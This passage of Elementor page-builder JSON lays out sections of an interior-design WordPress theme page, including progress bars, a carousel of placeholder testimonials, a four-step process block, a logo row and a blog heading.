t_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right 